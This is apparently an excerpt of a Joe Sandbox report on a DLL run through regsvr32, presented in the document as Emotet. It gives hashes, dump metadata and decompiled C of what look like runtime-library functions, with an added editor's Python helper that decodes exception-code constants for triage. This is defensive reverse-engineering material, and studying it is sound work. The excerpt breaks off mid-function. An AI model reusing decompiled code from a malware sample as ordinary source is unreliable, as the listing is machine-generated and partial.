                                                                                            • Instruction ID: be0361fe5fc774fdb93e2323036551c88fb1abd5f2001d1ea80391924f68e359
                                                                                            • Opcode Fuzzy Hash: bd0d3b981fc10e7cfe1f2c0abaf01122f4bff4453aed3835adc87ef51088108d
                                                                                            • Instruction Fuzzy Hash: 80115B7070924881FADBD32569553E932927F8C7F0F18C324B8B9067DADE69C64D5701
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value
                                                                                            • String ID:
                                                                                            • API String ID: 3702945584-0
                                                                                            • Opcode ID: bd7431c49e4a679ad0fc349417f75538c94fde3ead8382cecdd8aabc73299240
                                                                                            • Instruction ID: 1e63756919ea820504c2c280bc0c9b8fbb4cbfe5ca1be2f3c00cf3ab00ed04ff
                                                                                            • Opcode Fuzzy Hash: bd7431c49e4a679ad0fc349417f75538c94fde3ead8382cecdd8aabc73299240
                                                                                            • Instruction Fuzzy Hash: F111397070624D41FAEBE22594527F932826B6D3F0F58CB24B93A0A2C7DE2C9A4D4310
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 68%
                                                                                            			E00000001180003800(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
                                                                                            				void* _t19;
                                                                                            				void* _t27;
                                                                                            				void* _t36;
                                                                                            				void* _t39;
                                                                                            				void* _t42;
                                                                                            				void* _t43;
                                                                                            				void* _t45;
                                                                                            				void* _t46;
                                                                                            				void* _t52;
                                                                                            				void* _t54;
                                                                                            				void* _t56;
                                                                                            				void* _t59;
                                                                                            
                                                                                            				_t27 = _t45;
                                                                                            				 *((long long*)(_t27 + 0x20)) = __rbx;
                                                                                            				 *((long long*)(_t27 + 0x18)) = __r8;
                                                                                            				 *((long long*)(_t27 + 0x10)) = __rdx;
                                                                                            				_t43 = _t27 - 0x3f;
                                                                                            				_t46 = _t45 - 0xc0;
                                                                                            				if ( *__rcx == 0x80000003) goto 0x800038a4;
                                                                                            				E00000001180002D40(_t27);
                                                                                            				r12d =  *((intOrPtr*)(_t43 + 0x6f));
                                                                                            				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x800038bf;
                                                                                            				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
                                                                                            				E00000001180002D40(_t27);
                                                                                            				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x800038bf;
                                                                                            				if ( *__rcx == 0xe0434f4d) goto 0x800038bf;
                                                                                            				r13d =  *((intOrPtr*)(_t43 + 0x77));
                                                                                            				if ( *__rcx == 0xe0434352) goto 0x800038c3;
                                                                                            				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
                                                                                            				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
                                                                                            				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
                                                                                            				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
                                                                                            				_t19 = E00000001180001F20(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
                                                                                            				if (_t19 == 0) goto 0x800038c3;
                                                                                            				return _t19;
                                                                                            			}
                                                                                            0x180003800
                                                                                            0x180003803
                                                                                            0x180003807
                                                                                            0x18000380b
                                                                                            0x18000381a
                                                                                            0x18000381e
                                                                                            0x180003834
                                                                                            0x180003836
                                                                                            0x18000383b
                                                                                            0x180003848
                                                                                            0x18000384c
                                                                                            0x180003855
                                                                                            0x18000385e
                                                                                            0x180003867
                                                                                            0x180003870
                                                                                            0x180003874
                                                                                            0x180003884
                                                                                            0x18000388c
                                                                                            0x180003891
                                                                                            0x180003896
                                                                                            0x18000389b
                                                                                            0x1800038a2
                                                                                            0x1800038be

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                             • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                             • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                             • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                             • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallEncodePointerTranslator
                                                                                            • String ID: MOC$RCC
                                                                                            • API String ID: 3544855599-2084237596
                                                                                            • Opcode ID: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                            • Instruction ID: 9ead3bcba03cb9e88f6155f8408b2a39bbeb34ce68d687e28d60bbf843815124
                                                                                            • Opcode Fuzzy Hash: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                            • Instruction Fuzzy Hash: 74613A36A04B888AEB62CF66D4413DD77A4F748B88F148216EF4917B99CF78D299C700
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%
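The three immediates compared against `*__rcx` in the function at 0x180003800 (0x80000003, 0xe0434f4d, 0xe0434352) are the source of the "String ID: MOC$RCC" above: a string extractor reading the two 0xE0xxxxxx constants as they sit in memory (little-endian) sees "MOC" and "RCC". The following is an added triage helper, not part of the Joe Sandbox report or the sample, that pulls those immediates out of the decompiled text and decodes them. The `KNOWN_CODES` table is assumed from the Windows SDK and CLR definitions (STATUS_BREAKPOINT and the two managed-exception codes); the decompiled lines embedded in it are copied from the block above. Taken together with the `EncodePointer` call, these checks are consistent with the MSVC CRT's SEH-translator path, which is this editor's assessment rather than a finding stated by the report, so a practitioner should treat this function as likely statically linked runtime code rather than Emotet's own logic.

```python
import re
import struct

# Decompiled statements copied from the report's function at 0x180003800;
# only the comparisons against *__rcx matter for this triage.
DECOMPILED = """
if ( *__rcx == 0x80000003) goto 0x800038a4;
if ( *__rcx == 0xe0434f4d) goto 0x800038bf;
if ( *__rcx == 0xe0434352) goto 0x800038c3;
"""

# Assumed reference table (Windows SDK ntstatus.h / CLR exception codes),
# not something the report itself states.
KNOWN_CODES = {
    0x80000003: "STATUS_BREAKPOINT",
    0xE0434F4D: "CLR managed exception (ASCII COM)",
    0xE0434352: "CLR v4 managed exception (ASCII CCR)",
}


def immediates(text):
    """Return every 32-bit immediate used in an '== 0x........' comparison, in order."""
    return [int(m, 16) for m in re.findall(r"==\s*0x([0-9a-fA-F]{8})", text)]


def low_bytes_ascii(code):
    """ASCII of the three low bytes as laid out in memory (little-endian).

    This is what a string scanner sees for the 0xE0xxxxxx CLR codes;
    returns None when the bytes are not all printable.
    """
    raw = struct.pack("<I", code)[:3]
    if all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None


def triage(text):
    """(code, meaning, memory-ASCII) for each immediate compared in the text."""
    return [
        (code, KNOWN_CODES.get(code, "unknown"), low_bytes_ascii(code))
        for code in immediates(text)
    ]


def report_string_id(text):
    """Rebuild the '$'-joined string id the sandbox derived from these constants."""
    return "$".join(s for _, _, s in triage(text) if s)


if __name__ == "__main__":
    for code, meaning, ascii_form in triage(DECOMPILED):
        print(f"0x{code:08X}  {meaning:40s}  {ascii_form or '-'}")
    print("string id:", report_string_id(DECOMPILED))
```

Running it against the embedded lines reproduces the report's string id, which is a quick way to confirm that a "suspicious" string in a sandbox hit is really an exception-code immediate in CRT code and not an indicator worth pivoting on.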

                                                                                            C-Code - Quality: 32%
                                                                                            			E0000000118000D5B8(void* __eax, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
                                                                                            				void* __rdi;
                                                                                            				void* __rsi;
                                                                                            				void* __rbp;
                                                                                            				intOrPtr _t183;
                                                                                            				signed int _t187;
                                                                                            				signed int _t194;
                                                                                            				signed int _t199;
                                                                                            				intOrPtr _t208;
                                                                                            				void* _t210;
                                                                                            				signed char _t211;
                                                                                            				void* _t261;
                                                                                            				signed long long _t262;
                                                                                            				long long _t267;
                                                                                            				long long _t269;
                                                                                            				void* _t270;
                                                                                            				long long _t272;
                                                                                            				intOrPtr* _t278;
                                                                                            				intOrPtr* _t285;
                                                                                            				long long _t287;
                                                                                            				long long _t313;
                                                                                            				void* _t321;
                                                                                            				long long _t322;
                                                                                            				void* _t323;
                                                                                            				long long _t324;
                                                                                            				long long _t326;
                                                                                            				signed char* _t327;
                                                                                            				signed char* _t328;
                                                                                            				signed char* _t329;
                                                                                            				void* _t330;
                                                                                            				void* _t331;
                                                                                            				void* _t332;
                                                                                            				signed long long _t333;
                                                                                            				intOrPtr _t336;
                                                                                            				intOrPtr _t339;
                                                                                            				void* _t341;
                                                                                            				signed long long _t343;
                                                                                            				signed long long _t345;
                                                                                            				long long _t354;
                                                                                            				void* _t358;
                                                                                            				long long _t359;
                                                                                            				signed long long _t362;
                                                                                            				char _t363;
                                                                                            				signed long long _t364;
                                                                                            				void* _t367;
                                                                                            				signed char* _t368;
                                                                                            				signed long long _t370;
                                                                                            
                                                                                            				_t261 = _t332;
                                                                                            				_t331 = _t261 - 0x57;
                                                                                            				_t333 = _t332 - 0xd0;
                                                                                            				 *((long long*)(_t331 - 9)) = 0xfffffffe;
                                                                                            				 *((long long*)(_t261 + 8)) = __rbx;
                                                                                            				_t262 =  *0x80021010; // 0x5e1a320b5ccd
                                                                                            				 *(_t331 + 0x17) = _t262 ^ _t333;
                                                                                            				 *((long long*)(_t331 - 0x41)) = __r8;
                                                                                            				_t278 = __rcx;
                                                                                            				 *((long long*)(_t331 - 0x59)) =  *((intOrPtr*)(_t331 + 0x7f));
                                                                                            				_t362 = __edx >> 6;
                                                                                            				 *(_t331 - 0x39) = _t362;
                                                                                            				_t370 = __edx + __edx * 8;
                                                                                            				_t267 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + 0x28 + _t370 * 8));
                                                                                            				 *((long long*)(_t331 - 0x19)) = _t267;
                                                                                            				r12d = r9d;
                                                                                            				_t359 = _t358 + __r8;
                                                                                            				 *((long long*)(_t331 - 0x61)) = _t359;
                                                                                            				 *((intOrPtr*)(_t331 - 0x49)) = GetConsoleOutputCP();
                                                                                            				if ( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x28)) != dil) goto 0x8000d658;
                                                                                            				0x80006f60();
                                                                                            				_t208 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x18)) + 0xc));
                                                                                            				 *((intOrPtr*)(_t331 - 0x45)) = _t208;
                                                                                            				 *((long long*)(__rcx)) = _t267;
                                                                                            				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                            				if ( *((intOrPtr*)(_t331 - 0x41)) - _t359 >= 0) goto 0x8000da03;
                                                                                            				_t343 = __edx >> 6;
                                                                                            				 *(_t331 - 0x11) = _t343;
                                                                                            				 *((char*)(_t331 - 0x71)) =  *((intOrPtr*)(__r8));
                                                                                            				 *((intOrPtr*)(_t331 - 0x6d)) = 0;
                                                                                            				r12d = 1;
                                                                                            				if (_t208 != 0xfde9) goto 0x8000d81d;
                                                                                            				_t285 = 0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8));
                                                                                            				if ( *_t285 == dil) goto 0x8000d6ca;
                                                                                            				_t367 = _t324 + 1;
                                                                                            				if (_t367 - 5 < 0) goto 0x8000d6b7;
                                                                                            				if (_t367 <= 0) goto 0x8000d7b3;
                                                                                            				r12d =  *((char*)(_t285 + 0x1800218d1));
                                                                                            				r12d = r12d + 1;
                                                                                            				_t183 = r12d - 1;
                                                                                            				 *((intOrPtr*)(_t331 - 0x51)) = _t183;
                                                                                            				_t336 = _t183;
                                                                                            				if (_t336 -  *((intOrPtr*)(_t331 - 0x61)) - __r8 > 0) goto 0x8000d980;
                                                                                            				_t287 = _t324;
                                                                                            				 *((char*)(_t331 + _t287 - 1)) =  *((intOrPtr*)(0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8))));
                                                                                            				if (_t287 + 1 - _t367 < 0) goto 0x8000d71b;
                                                                                            				if (_t336 <= 0) goto 0x8000d74b;
                                                                                            				0x80004b30();
                                                                                            				_t354 =  *((intOrPtr*)(_t331 - 0x59));
                                                                                            				_t313 = _t324;
                                                                                            				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + _t313 + 0x3e + _t370 * 8)) = dil;
                                                                                            				if (_t313 + 1 - _t367 < 0) goto 0x8000d74e;
                                                                                            				 *((long long*)(_t331 - 0x31)) = _t324;
                                                                                            				_t269 = _t331 - 1;
                                                                                            				 *((long long*)(_t331 - 0x29)) = _t269;
                                                                                            				_t187 = (0 | r12d == 0x00000004) + 1;
                                                                                            				r12d = _t187;
                                                                                            				r8d = _t187;
                                                                                            				 *((long long*)(_t333 + 0x20)) = _t354;
                                                                                            				E0000000118000E384(_t269, __rcx, _t331 - 0x6d, _t331 - 0x29, _t336, _t331 - 0x31);
                                                                                            				if (_t269 == 0xffffffff) goto 0x8000da03;
                                                                                            				_t326 = __r8 +  *((intOrPtr*)(_t331 - 0x51)) - 1;
                                                                                            				goto 0x8000d8ae;
                                                                                            				_t363 =  *((char*)(_t269 + 0x1800218d0));
                                                                                            				_t210 = _t363 + 1;
                                                                                            				_t270 = _t210;
                                                                                            				if (_t270 -  *((intOrPtr*)(_t331 - 0x61)) - _t326 > 0) goto 0x8000d9ae;
                                                                                            				 *((long long*)(_t331 - 0x51)) = _t324;
                                                                                            				 *((long long*)(_t331 - 0x21)) = _t326;
                                                                                            				_t194 = (0 | _t210 == 0x00000004) + 1;
                                                                                            				r14d = _t194;
                                                                                            				r8d = _t194;
                                                                                            				 *((long long*)(_t333 + 0x20)) = _t354;
                                                                                            				_t345 = _t331 - 0x51;
                                                                                            				E0000000118000E384(_t270, _t278, _t331 - 0x6d, _t331 - 0x21,  *((intOrPtr*)(_t331 - 0x61)) - _t326, _t345);
                                                                                            				if (_t270 == 0xffffffff) goto 0x8000da03;
                                                                                            				_t327 = _t326 + _t363;
                                                                                            				r12d = r14d;
                                                                                            				_t364 =  *(_t331 - 0x39);
                                                                                            				goto 0x8000d8ae;
                                                                                            				_t339 =  *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8));
                                                                                            				_t211 =  *(_t339 + 0x3d + _t370 * 8);
                                                                                            				if ((_t211 & 0x00000004) == 0) goto 0x8000d850;
                                                                                            				 *((char*)(_t331 + 7)) =  *((intOrPtr*)(_t339 + 0x3e + _t370 * 8));
                                                                                            				 *((char*)(_t331 + 8)) =  *_t327;
                                                                                            				 *(_t339 + 0x3d + _t370 * 8) = _t211 & 0x000000fb;
                                                                                            				r8d = 2;
                                                                                            				goto 0x8000d899;
                                                                                            				r9d =  *_t327 & 0x000000ff;
                                                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t354 + 0x18)))) + _t345 * 2)) >= 0) goto 0x8000d893;
                                                                                            				_t368 =  &(_t327[1]);
                                                                                            				if (_t368 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000d9e0;
                                                                                            				r8d = 2;
                                                                                            				if (E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t327, _t324, _t327, _t331, _t339, _t354) == 0xffffffff) goto 0x8000da03;
                                                                                            				_t328 = _t368;
                                                                                            				goto 0x8000d8ae;
                                                                                            				_t199 = E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t328, _t324, _t328, _t331, _t359, _t354);
                                                                                            				if (_t199 == 0xffffffff) goto 0x8000da03;
                                                                                            				_t329 =  &(_t328[1]);
                                                                                            				 *((long long*)(_t333 + 0x38)) = _t324;
                                                                                            				 *((long long*)(_t333 + 0x30)) = _t324;
                                                                                            				 *((intOrPtr*)(_t333 + 0x28)) = 5;
                                                                                            				_t272 = _t331 + 0xf;
                                                                                            				 *((long long*)(_t333 + 0x20)) = _t272;
                                                                                            				r9d = r12d;
                                                                                            				_t341 = _t331 - 0x6d;
                                                                                            				E0000000118000A154();
                                                                                            				r14d = _t199;
                                                                                            				if (_t199 == 0) goto 0x8000da03;
                                                                                            				 *((long long*)(_t333 + 0x20)) = _t324;
                                                                                            				r8d = _t199;
                                                                                            				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
                                                                                            				 *((intOrPtr*)(_t278 + 4)) = __esi -  *((intOrPtr*)(_t331 - 0x41)) +  *((intOrPtr*)(_t278 + 8));
                                                                                            				if ( *((intOrPtr*)(_t331 - 0x69)) - r14d < 0) goto 0x8000da03;
                                                                                            				if ( *((char*)(_t331 - 0x71)) != 0xa) goto 0x8000d966;
                                                                                            				 *((short*)(_t331 - 0x71)) = 0xd;
                                                                                            				 *((long long*)(_t333 + 0x20)) = _t324;
                                                                                            				_t130 = _t272 - 0xc; // 0x1
                                                                                            				r8d = _t130;
                                                                                            				_t321 = _t331 - 0x71;
                                                                                            				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
                                                                                            				if ( *((intOrPtr*)(_t331 - 0x69)) - 1 < 0) goto 0x8000da03;
                                                                                            				 *((intOrPtr*)(_t278 + 8)) =  *((intOrPtr*)(_t278 + 8)) + 1;
                                                                                            				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + 1;
                                                                                            				if (_t329 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000da03;
                                                                                            				goto 0x8000d681;
                                                                                            				if (_t321 <= 0) goto 0x8000d9a9;
                                                                                            				_t330 = _t329 - _t368;
                                                                                            				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + _t368 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t330 + _t368));
                                                                                            				if (1 - _t321 < 0) goto 0x8000d988;
                                                                                            				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) +  *((intOrPtr*)(_t278 + 4));
                                                                                            				goto 0x8000da03;
                                                                                            				if (_t341 <= 0) goto 0x8000d9da;
                                                                                            				_t322 = _t324;
                                                                                            				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 +  *(_t331 - 0x39) * 8)) + _t322 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t322 + _t330));
                                                                                            				_t323 = _t322 + 1;
                                                                                            				if (2 - _t341 < 0) goto 0x8000d9ba;
                                                                                            				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + r8d;
                                                                                            				goto 0x8000da03;
                                                                                            				 *((intOrPtr*)(_t341 + 0x3e + _t370 * 8)) = r9b;
                                                                                            				 *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) | 0x00000004;
                                                                                            				_t173 = _t323 + 1; // 0x1
                                                                                            				 *((intOrPtr*)(_t278 + 4)) = _t173;
                                                                                            				goto 0x8000da03;
                                                                                            				 *_t278 = GetLastError();
                                                                                            				return E000000011800010B0(_t206,  *((intOrPtr*)(_t331 - 0x45)),  *(_t331 + 0x17) ^ _t333);
                                                                                            			}
Instruction addresses for the function listed above (the address column of the listing, 0x18000d5b8 to 0x18000da2c, one entry per decompiled statement):
0x18000d5b8, 0x18000d5c6, 0x18000d5ca, 0x18000d5d1, 0x18000d5d9, 0x18000d5dd, 0x18000d5e7, 0x18000d5ee, 0x18000d5f5, 0x18000d5fc,
0x18000d606, 0x18000d60a, 0x18000d618, 0x18000d624, 0x18000d629, 0x18000d62d, 0x18000d630, 0x18000d633, 0x18000d63d, 0x18000d64a,
0x18000d64f, 0x18000d65c, 0x18000d65f, 0x18000d664, 0x18000d667, 0x18000d66e, 0x18000d677, 0x18000d67b, 0x18000d683, 0x18000d686,
0x18000d689, 0x18000d69c, 0x18000d6af, 0x18000d6ba, 0x18000d6be, 0x18000d6c8, 0x18000d6cd, 0x18000d6e1, 0x18000d6ea, 0x18000d6f0,
0x18000d6f2, 0x18000d6fc, 0x18000d702, 0x18000d708, 0x18000d71d, 0x18000d72a, 0x18000d72f, 0x18000d73b, 0x18000d740, 0x18000d74b,
0x18000d759, 0x18000d764, 0x18000d766, 0x18000d76a, 0x18000d76e, 0x18000d77b, 0x18000d77d, 0x18000d780, 0x18000d783, 0x18000d794,
0x18000d79d, 0x18000d7ab, 0x18000d7ae, 0x18000d7b6, 0x18000d7bf, 0x18000d7ca, 0x18000d7d0, 0x18000d7d6, 0x18000d7da, 0x18000d7e6,
0x18000d7e8, 0x18000d7eb, 0x18000d7ee, 0x18000d7f3, 0x18000d7ff, 0x18000d808, 0x18000d80e, 0x18000d811, 0x18000d814, 0x18000d818,
0x18000d81d, 0x18000d825, 0x18000d82d, 0x18000d834, 0x18000d839, 0x18000d83f, 0x18000d844, 0x18000d84e, 0x18000d850, 0x18000d860,
0x18000d862, 0x18000d86a, 0x18000d873, 0x18000d888, 0x18000d88e, 0x18000d891, 0x18000d8a0, 0x18000d8a8, 0x18000d8ae, 0x18000d8b1,
0x18000d8b6, 0x18000d8bb, 0x18000d8c3, 0x18000d8c7, 0x18000d8cc, 0x18000d8cf, 0x18000d8d8, 0x18000d8dd, 0x18000d8e2, 0x18000d8e8,
0x18000d8f1, 0x18000d907, 0x18000d915, 0x18000d91c, 0x18000d926, 0x18000d92d, 0x18000d931, 0x18000d93a, 0x18000d93a, 0x18000d93e,
0x18000d94d, 0x18000d957, 0x18000d95d, 0x18000d960, 0x18000d96a, 0x18000d97b, 0x18000d983, 0x18000d985, 0x18000d997, 0x18000d9a7,
0x18000d9a9, 0x18000d9ac, 0x18000d9b1, 0x18000d9b3, 0x18000d9c8, 0x18000d9cf, 0x18000d9d8, 0x18000d9da, 0x18000d9de, 0x18000d9e0,
0x18000d9ed, 0x18000d9f3, 0x18000d9f6, 0x18000d9f9, 0x18000da01, 0x18000da2c

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                            • String ID:
                                                                                            • API String ID: 2718003287-0
                                                                                            • Opcode ID: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                            • Instruction ID: d53985ea959d49848d9070d6669198272c686acab0006873b77d48ca537a322a
                                                                                            • Opcode Fuzzy Hash: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                            • Instruction Fuzzy Hash: 1CD1E332B18A8889E752CFA9D4403EC3BB1F3597D8F148216EE5D97B99DE34C60AC750
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 28%
                                                                                            			E0000000118000DEE0(void* __ebx, signed int __ecx, void* __esi, void* __ebp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
                                                                                            				signed long long _v88;
                                                                                            				void* _v96;
                                                                                            				void* _v108;
                                                                                            				signed int _v112;
                                                                                            				intOrPtr _v120;
                                                                                            				signed int _v124;
                                                                                            				long _v128;
                                                                                            				signed int _v136;
                                                                                            				long long _v144;
                                                                                            				signed int _v152;
                                                                                            				void* __rbx;
                                                                                            				void* __rsi;
                                                                                            				void* __rbp;
                                                                                            				signed short _t99;
                                                                                            				void* _t107;
                                                                                            				long _t116;
                                                                                            				signed int _t117;
                                                                                            				void* _t122;
                                                                                            				signed short _t127;
                                                                                            				signed int _t130;
                                                                                            				signed short _t133;
                                                                                            				signed short _t159;
                                                                                            				signed short _t167;
                                                                                            				signed long long _t180;
                                                                                            				signed int _t184;
                                                                                            				signed short* _t197;
                                                                                            				signed int _t204;
                                                                                            				signed int _t205;
                                                                                            				signed short* _t206;
                                                                                            				void* _t208;
                                                                                            				signed long long _t220;
                                                                                            				void* _t221;
                                                                                            				signed long long _t222;
                                                                                            				signed long long _t223;
                                                                                            				void* _t224;
                                                                                            				signed short* _t226;
                                                                                            
                                                                                            				_t197 = __rdx;
                                                                                            				_t122 = __ebx;
                                                                                            				r14d = r8d;
                                                                                            				_t184 = __r9;
                                                                                            				_t206 = __rdx;
                                                                                            				if (r8d == 0) goto 0x8000e1d3;
                                                                                            				if (__rdx != 0) goto 0x8000df47;
                                                                                            				 *((char*)(__r9 + 0x38)) = 1;
                                                                                            				r8d = 0;
                                                                                            				 *((intOrPtr*)(__r9 + 0x34)) = 0;
                                                                                            				 *((char*)(__r9 + 0x30)) = 1;
                                                                                            				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                                            				r9d = 0;
                                                                                            				_v144 = __r9;
                                                                                            				_v152 = _t205;
                                                                                            				E000000011800084EC(__rax, __r9, __rcx, __rdx, __rdx, _t208, __r8);
                                                                                            				goto 0x8000e1d5;
                                                                                            				_t220 = __ecx >> 6;
                                                                                            				_v88 = _t220;
                                                                                            				_t223 = __ecx + __ecx * 8;
                                                                                            				_t99 =  *((intOrPtr*)(0x800227f0 + 0x39 + _t223 * 8));
                                                                                            				_v136 = _t99;
                                                                                            				if (_t99 - 1 - 1 > 0) goto 0x8000df7e;
                                                                                            				if (( !r14d & 0x00000001) == 0) goto 0x8000df10;
                                                                                            				if (( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0x8000df94;
                                                                                            				_t23 = _t197 + 2; // 0x2
                                                                                            				r8d = _t23;
                                                                                            				E0000000118000E958(r15d);
                                                                                            				_v112 = _t205;
                                                                                            				if (E0000000118000E2E0(r15d, __ecx) == 0) goto 0x8000e0c3;
                                                                                            				if ( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0x8000e0c3;
                                                                                            				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x8000dfd3;
                                                                                            				0x80006f60();
                                                                                            				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t205) goto 0x8000dfef;
                                                                                            				_t180 =  *((intOrPtr*)(0x800227f0 + _t220 * 8));
                                                                                            				if ( *((intOrPtr*)(_t180 + 0x39 + _t223 * 8)) == dil) goto 0x8000e0c3;
                                                                                            				if (GetConsoleMode(??, ??) == 0) goto 0x8000e0bc;
                                                                                            				_t127 = _v136;
                                                                                            				_t159 = _t127;
                                                                                            				if (_t159 == 0) goto 0x8000e099;
                                                                                            				if (_t159 == 0) goto 0x8000e024;
                                                                                            				if (_t127 - 1 != 1) goto 0x8000e15d;
                                                                                            				_t221 = _t206 + _t224;
                                                                                            				_v128 = _t205;
                                                                                            				_t226 = _t206;
                                                                                            				if (_t206 - _t221 >= 0) goto 0x8000e090;
                                                                                            				r14d = _v124;
                                                                                            				_v136 =  *_t226 & 0x0000ffff;
                                                                                            				_t107 = E0000000118000E960( *_t226 & 0xffff);
                                                                                            				_t130 = _v136 & 0x0000ffff;
                                                                                            				if (_t107 != _t130) goto 0x8000e087;
                                                                                            				r14d = r14d + 2;
                                                                                            				_v124 = r14d;
                                                                                            				if (_t130 != 0xa) goto 0x8000e07c;
                                                                                            				if (E0000000118000E960(0xd) != 0xd) goto 0x8000e087;
                                                                                            				r14d = r14d + 1;
                                                                                            				_v124 = r14d;
                                                                                            				if ( &(_t226[1]) - _t221 >= 0) goto 0x8000e090;
                                                                                            				goto 0x8000e038;
                                                                                            				_v128 = GetLastError();
                                                                                            				_t222 = _v88;
                                                                                            				goto 0x8000e153;
                                                                                            				r9d = r14d;
                                                                                            				_v152 = __r9;
                                                                                            				E0000000118000D5B8(_t109, r15d, __esi, __ebp, __r9,  &_v128, _t206);
                                                                                            				asm("movsd xmm0, [eax]");
                                                                                            				goto 0x8000e158;
                                                                                            				if ( *((intOrPtr*)( *((intOrPtr*)(0x800227f0 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0x8000e120;
                                                                                            				_t133 = _v136;
                                                                                            				_t167 = _t133;
                                                                                            				if (_t167 == 0) goto 0x8000e10c;
